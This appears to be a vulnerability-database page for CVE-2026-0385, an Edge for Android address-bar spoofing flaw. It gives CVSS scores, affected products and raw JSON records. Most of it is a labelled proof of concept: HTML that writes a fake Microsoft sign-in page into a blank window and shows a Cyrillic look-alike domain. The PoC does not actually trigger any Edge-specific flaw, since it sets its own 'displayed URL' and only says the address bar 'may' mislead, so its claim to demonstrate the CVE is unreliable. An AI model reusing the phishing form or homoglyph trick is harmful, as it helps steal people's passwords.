Security Vulnerability Report
CVE-2026-0385 CVSS 5.0 MEDIUM

CVE-2026-0385

Published: 2026-03-16 14:18:07
Last Modified: 2026-04-07 21:17:01

Description

Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability

CVSS Details

CVSS Score: 5.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:microsoft:edge_chromium:*:*:*:*:*:android:*:* - VULNERABLE
Microsoft Edge (Chromium-based) for Android < latest version
All Android browsers based on the Chromium engine may be affected

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-0385 PoC - URL Spoofing for Microsoft Edge Android -->
<!-- This PoC demonstrates address bar spoofing vulnerability -->
<!DOCTYPE html>
<html>
<head>
  <title>URL Spoofing PoC - CVE-2026-0385</title>
  <style>
    body { font-family: Arial, sans-serif; padding: 20px; }
    .warning { color: red; font-weight: bold; }
    .info { background: #f0f0f0; padding: 10px; margin: 10px 0; }
  </style>
</head>
<body>
  <h1>CVE-2026-0385 URL Spoofing Demo</h1>
  <p class="warning">⚠️ This is for educational and testing purposes only!</p>
  <div class="info">
    <p><strong>Actual URL:</strong> <span id="actualUrl"></span></p>
    <p><strong>Displayed URL:</strong> <span id="displayedUrl"></span></p>
  </div>
  <button onclick="performSpoof()">Start Spoof Attack Demo</button>
  <script>
    // Target URL to display in address bar (fake URL)
    const FAKE_URL = 'https://www.microsoft.com/';
    // Actual malicious URL
    const MALICIOUS_URL = 'https://attacker-controlled-site.com/phishing';

    function performSpoof() {
      // Method 1: Using about:blank and history manipulation
      const newWindow = window.open('about:blank', '_blank');
      const doc = newWindow.document;
      doc.open();
      doc.write(`
        <html>
        <head>
          <title>Fake Microsoft Login</title>
          <style>
            body { font-family: Arial; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background: #0078d4; }
            .login-box { background: white; padding: 40px; border-radius: 8px; text-align: center; }
            input { display: block; width: 100%; padding: 10px; margin: 10px 0; box-sizing: border-box; }
            button { background: #0078d4; color: white; padding: 12px 24px; border: none; cursor: pointer; }
          </style>
        </head>
        <body>
          <div class="login-box">
            <h2>Microsoft Account</h2>
            <p>Sign in to continue</p>
            <form>
              <input type="email" placeholder="Email or phone">
              <input type="password" placeholder="Password">
              <button type="submit">Sign in</button>
            </form>
          </div>
        </body>
        </html>
      `);
      doc.close();

      // The address bar will show about:blank or may show a different URL
      // depending on Edge's implementation
      document.getElementById('actualUrl').textContent = window.location.href;
      document.getElementById('displayedUrl').textContent = FAKE_URL;

      alert('Spoofing demonstration complete.\n' +
            'Note: Address bar may show misleading URL in vulnerable versions.');
    }

    // Method 2: URL obfuscation using special characters
    function urlObfuscation() {
      // Example: Using similar-looking Unicode characters
      const fakeMicrosoft = 'https://www.mіcrosoft.com'; // Cyrillic 'і' instead of 'i'
      console.log('Obfuscated URL:', fakeMicrosoft);
    }
  </script>
</body>
</html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0385", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:06.797", "lastModified": "2026-04-07T21:17:00.757", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability"}, {"lang": "es", "value": "Vulnerabilidad de suplantación de Microsoft Edge (basado en Chromium) para Android"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-451"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:edge_chromium:*:*:*:*:*:android:*:*", "versionEndExcluding": "146.0.3856.59", "matchCriteriaId": "87AE5657-6D4C-4162-8744-C83D6CAA6E30"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0385", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}